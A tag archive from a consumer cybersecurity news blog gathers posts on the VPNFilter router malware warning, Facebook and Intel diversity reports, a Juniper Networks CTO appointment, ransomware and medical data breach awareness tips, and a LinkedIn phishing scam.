Tag Archives: Symantec

ALERT! Reboot Your Router NOW! – ALERT!

The FBI has issued an urgent warning and request to everyone who owns a home router to reboot the device to thwart a Russian cyber attack. Cisco security researchers at the company’s cyber intelligence unit by the name of Talos warned of the attack by malware named VPNFilter.  According to Talos VPNFilter has infected an estimated 500,000 consumer routers in 54 countries. Routers targeted are Linksys, MikroTik, Netgear and TP-Link, and potentially others.

On Friday the FBI warned that anyone with a small office or home office router (SOHO) reboot their devices to stop the malware. Rebooting is simply turning the device off and then back on again.

According to the FBI the threat is  “significant.” The FBI warning stated that the malware, once it has infected the router, could stop the router from working, collect user information from any device connected to it and possibly block network traffic.

The Justice Department  has reported that the malware is connected to a Russian government backed cyber espionage group that’s been called Sofacy, APT 28 or Fancy Bear by researchers. 

The problem is that the FBI can’t determine how VPNFilter is getting on people’s systems. By rebooting the router owners can disrupt the malware and delete parts of it’s code. However, the router can be reinfected.

As part of the operation to shutdown the malware attack the FBI, armed with a court order, seized control of a key server in the Kremlin’s global botnet of hacked routers.

The seizure destroys VPNFilter’s ability to reactivate after a router reboots, according to Vikram Thakur, technical director at Symantec. “The payload itself is non-persistent and will not survive if the router is restarted,” said Thakur. “That payload will vanish.”

You can check the security of your router free by visiting  F-Secure.com Router Check.

See also: Oregon FBI Tech Tuesday: Building a Digital Defense Against the “VPNFILTER” Malware



Facebook and Intel Report Diversity Improvement

Maxine Williams, Facebook’s Executive Diversity Chief

Facebook’s surprising diversity report showed marked improvement in hiring of women and minorities. While the report shows that Facebook is still overwhelmingly white and male the improvements show that Maxine Williams, Facebook’s Executive Diversity Chief, is having an effect on the company.   Facebook’s report revealed 35 percent of its staff  are women, up from 33 percent a year ago. The number of number of women in leadership positions is up a percent to 28 percent.

Even with these improvements retention of female employees in the tech sector is a another challenge. Women are leaving the industry after hire in the face or sexism and other bias. So these numbers for Facebook can only be considered an improvement if women stay on with the company.

The report shows an increase of Hispanic employees of 4 to 5 percent and African-Americans by 2 to 3 percent. However the guys at the top are still white men making up 71 percent of the company leadership. No change there.  The rest of the company leadership is held by Asians at 21 percent with other groups holding only 2 to 3 percent.

How is Williams making change happen? Along side the diversity report Williams blogged about initiatives she believes are improving Facebook’s hiring and workplace culture. She pointed out the  “Diverse Slate Approach,” which encourages consideration of applicants who don’t look like the hiring managers.  According to Williams Facebook has discovered that “the more people you interview who don’t look or think like you, the more likely you are to hire someone from a diverse background.”  Facebook’s “Managing Inclusion,” training program teaches managers to consider what issues affect under-represented groups.  Facebook believes that this training helps to build an understanding of how these employees or applicants arrived in tech the industry and what obstacles remain.

Williams believes Facebook is moving in the right direction but said, “We aren’t where we’d like to be.”

Intel CEO Brian Krzanich

Another major tech company is also touting its diversity improvements.  Intel has reported that its diversity program is actually two years ahead of schedule.  In a recent blog post Intel CEO Brian Krzanich claims Intel is two years ahead of its original diversity plan. “We set out to achieve by 2020 an inclusive workforce that reflects the diversity we see every day in the world around us,” he wrote. “Doing this would bring the number of female, Hispanic, African-American and Native American employees in Intel’s 50,000-strong U.S. workforce to full representation.” According to Krzanich the goal is now moved up to 2018.

Krzanich, in a stand against racism, resigned from President Trump’s American Manufacturing Council after comments the president made about the events in Charlottesville that one left one woman dead. According to Krzanich he wants to “…call attention to the serious harm our divided political climate is causing to critical issues…”

Intel’s mid-year report shows the company’s five-year plan is on track to bring full representation of  women, African Americans, Hispanics and Native Americans in both technical and non-technical jobs. According to Intel full representation is defined as the “full market availability of women and underrepresented minorities.”

“In December of 2014, our gap to full representation was 2,300 employees. Today that gap has narrowed to 801 people, a 65 percent improvement, said Krzanich.

But like Facebook and other tech companies white and Asian men still represent  almost all top management positions. More than 90 percent of Intel’s mid to senior-level technical roles are white and Asian men.  Intel is also dealing with a retention problem with women and minorities. The company says it has added “diversity playbooks” and other programs to help managers hire and retain under-represented groups.

Although diversity in the tech sector is a real issue, and progress is epically slow, there is progress. According to workplace culture and company review platform Comparably  companies are doing better.

Comparably has come out with a list of the top ten companies that are doing better than most in the area of workplace diversity. The scores of these companies are on a 0-100 scale and based how female employees rate their experience at the company. The diversity score is based on how employees of color rate their experience at a company. Here is Comparably’s list for women.

For diversity




Juniper Networks Names African-American To CTO Post


Kevin Walker

Kevin Walker was named as the Security Chief Technology Officer or CTO for Juniper Networks on November 12th.

Walker comes to Juniper from Walmart where he served as vice president and assistant Chief Information Officer or CIO. Walker has more than 25 years experience working at some of Silicon Valleys’ biggest tech companies. His former employers include Cisco, Symantec and Veritas software.

Juniper Networks designs, builds and operates corporate computer networks and provides security products and solutions for those networks. The company employs 8,800 people in 46 countries.

Walker will take on the job of guiding Juniper Development and Innovation expanding the company’s security product development. Walker will also help to lead Juniper’s security strategy both internally and externally with investors, partners, influencers and customers. 

In a press release Walker said, “Juniper Networks has always challenged conventions in the networking industry and has maintained its focus on cyber security as a core function of how it continues to innovate and transform. I am excited to apply my professional and personal passion to help guide the company in delivering technologies to customers that enable them to stay secure amid today’s evolving landscape.”


National Cyber Security Awareness Month – Ransomware

Cyber Security Awareness MonthOctober is National Cyber Security Awareness Month. The African-American Cyber Report is dedicated to bringing the latest most relevant cyber security news and information to black people.

Cyber security has become the single most urgent topic of our age. More people fear having their identity stolen than being robbed at gunpoint or murdered.

In order to combat that fear and protect yourself and family members you need to understand what is hapening in the cyber world and how it affects you. When it comes to Internet related news the African-American Cyber Report answers the question for black people when they ask; “What does that mean to me?”

As part of National Cyber Security Awareness Month the AACR is revealing the top cyber security threats of 2015 and the coming new year and how black people should respond.


First what is ransomware? Ransomware is a dangerous type of malware, which completely blocks access to a computer system. In other words if you get infected with ransomeware your computer will be locked up until you pay the hacker to release your computer and all its files. They often demand payment in bitcoins and if you don’t pay it is unlikely you will ever use that computer or see the data in it ever again. Yes, there are some ways to defeat ransomeware once you get hit but nothing is gauranteed.

Ransomware is expected to become more refined in its targets and methods. Cyber security experts predict that the variants of ransomware may target cloud based data storage such as Google Drive, Dropbox, OneDrive and many more. Once the cloud storage site is detected ransomware will exploit the stored personal credentials of the logged-in user and will even infect the website where the data is backed up. McAfee has warned that ransomware attackers will try as many ways possible to extort ransom payments from victims.

Now, how do you avoid getting hit by ransomware? First of all never, ever click on a link or open an attachment in an email from someone you do not know. And even if you do know the sender if you are not expecting the email pick up the phone and call them. Ask what have you sent me? Did you send it?  Remember, many viruses have the capability to email themselves to other computers. If the sender did not send the email then delete the email immediately. Ransomware is mostly found on suspicious websites, and arrives either via adrive-by download”, stealth download or through a user clicking on an infected advertisement or pop-up. Other actions you need to perform include;

  • Have security (anti-virus, anti-malware) software installed and up to date with a current subscription. Thousands of new malware variants  land on the Internet every day.  Outdated virus and malware definitions is almost as bad has having no protection at all.
  • Perform regular updates on all you computer software.  This includes the operating system, the browser and all of the plug-ins that a modern browser typically uses. The most common openings for malware and virus infections is through a software vulnerability or zero day exploits. Keeping software up to date helps minimize the likelihood you get caught up.
  • Make sure you are leveraging the full set of protection features delivered in your security product. Symantec and Norton products include five distinct layers of protection: Network (Intrusion Prevention), File (traditional AntiVirus, Reputation (Insight), Behavioral (SONAR) and Repair (ERASER and Norton Power Eraser).

Now you know. Tommorow, Public WiFi.



Understanding Medical Data Breaches

canstockphoto24985079Medical data breaches are constantly in the news.  According to iHealthBeat.org 1 in 10 U.S. residents have been impacted by a medical data breach. It is highly likely that millions of African-Americans have been the victim of a medical data breach and probably don’t know it. The sad news is that this has become common.

We need to understand a few things about data breaches. First, what is a data breach? What kind of data breaches are there? How many people are affected and how do you fight back if you think your data has been compromised.

Put simply a data breach is an incident where sensitive, protected or confidential information has been exposed, stolen or utilized by unauthorized individuals often to commit some type of crime.

What kind of data breaches are there? Data breaches may expose personal health information (PHI) this is a medical data breach.  Personally identifiable information (PII) is information that, on its own or combined with other information can be used to identify, contact, or locate a person, or identify an individual in context. Finally there is a data breach that exposes trade secrets or intellectual property. This usually affects businesses and sometimes falls known as industrial espionage.

Medical data breaches often involve massive numbers of people and personal information records. Here are the largest medical data breaches so far this year. Look carefully, your insurance company may be on the list.

Keep in mind that medical insurance companies are not alone when it comes to data breaches. Hospitals and health service providers are a prime target for medical data hackers. The HIPAA Act covers most medical facilities. HIPAA is the federal Health Insurance Portability and Accountability Act of 1996. The law is intended to make it easier for people to keep health insurance, protect the confidentiality and security of healthcare information and help the healthcare industry control administrative costs.

According to Datapipe.com these are the largest HIPAA data breaches of  2014.

According to a report released by KPMG 81 percent of health insurance providers and hospitals have had a data breach. The survey revealed,

  • 15 percent of healthcare organizations have no one whose sole responsibility is information security.
  • 23 percent do not have a security operations center to identify and evaluate threats.
  • 55 percent say they have a hard time staffing their organization.

Why is medical data so valuable? Medical records are ten times more valuable to hackers than your credit cards.

Your medical information is a gold mine. You probably have medical information spread over several doctor’s offices, medical services and hospitals including your dentist, pharmacy and physical therapist. These records contain information such as your Social Security number, address and phone number, email, next of kin information, phone numbers, information about your children or spouse, payment information, insurance information, and much more.

Hackers use stolen medical and insurance data to create fake IDs, buy medical equipment or drugs that they can re-sell and file fraudulent claims with insurance providers. Hackers also have more time to use stolen data to commit fraud because medical identity theft is not immediately apparent.  And mostly because these records are easy targets. According to the KMPG report hospitals and medical insururance companies are poor protectors of your information. According to the security firm Symantec health care providers saw a 72 percent increase in cyberattacks from 2013 to 2014, Health care companies are required by law to publicly disclose big health data breaches. There were more than 270 such disclosures in the last two years.

So how can African-Americans avoid the theft of their medical information?

  • If your wallet is lost or stolen, make sure your insurer(s) are notified along with your financial institutions.
  • Carefully examine all medical bills and insurance statements you receive. Look for fees from health care providers you do not recognize or statements describing benefits paid out for services you did not obtain.
  • Consider an identity protection service which will help you detect most kinds of identity theft, including medical, much earlier than you might on your own and assist you through the fraud resolution process if your information is stolen.
  • Always be alert to strange phone calls or emails from people asking medical questions or insurance questions, especially if you do not know the company.
  • Alert your caregivers of any suspicious calls or activity regarding your care.
  • Keep a close watch on your credit and banking resources. Alert you financial institutions of any suspicious or fraudulent activity.
  • Take full advantage of credit monitoring services if offered.

The loss of medical data can have a devasating personal impact. An unlucky victim may have their medical insurance coverage cancelled or suspended due to fraudulent claims. Insurance premiums may skyrocket. Others may have their identity stolen completely. Changes, intentional or accidental, to medical records could result in mis-diagnosis or mis-treatment of illnesses. Pay attention to data breach notifications. The African American Cyber Report is an excellent source for the latest breach notifications.

Know you know


ALERT! – Phishing Email Scam hits LinkedIn – ALERT!

Scammers are phishing for LinkedIn members log in credentials by sending emails that are supposed to be from LinkedIn Support.

Symantec Senior Security Response Manager  Satnam Narang wrote about the phishing campaign observed over the past week.

In the post Narange stated; “The body of the email claims that irregular activities have prompted a ‘compulsory security update’ for the recipient’s LinkedIn account.”

Instead, opening the attachment leads to a website, which looks like a legitimate LinkedIn login page, he said. The scammers have changed the websites source so that the login and password credentials are sent to the scammer.

Victims are duped into believing the email is authentic by using a lowercase ‘i’, as opposed to an uppercase ‘I’ in the bogus LinkedIn address.

Symantec pointed out that the scammers used HTML attachments in order to bypass browser blacklists. These black lists serve to keep users off phishing websites. Narang stated the best defense against this scam is to  implement LinkedIn’s two-step verification for improved login security.

“With two-step verification enabled, even if a user’s credentials are compromised, an attacker would not be able to log-in without having access to the user’s mobile phone,” he said.

If you believe that you have been scammed and you credentials are compromised then please change your password immediately and notify LinkedIn support.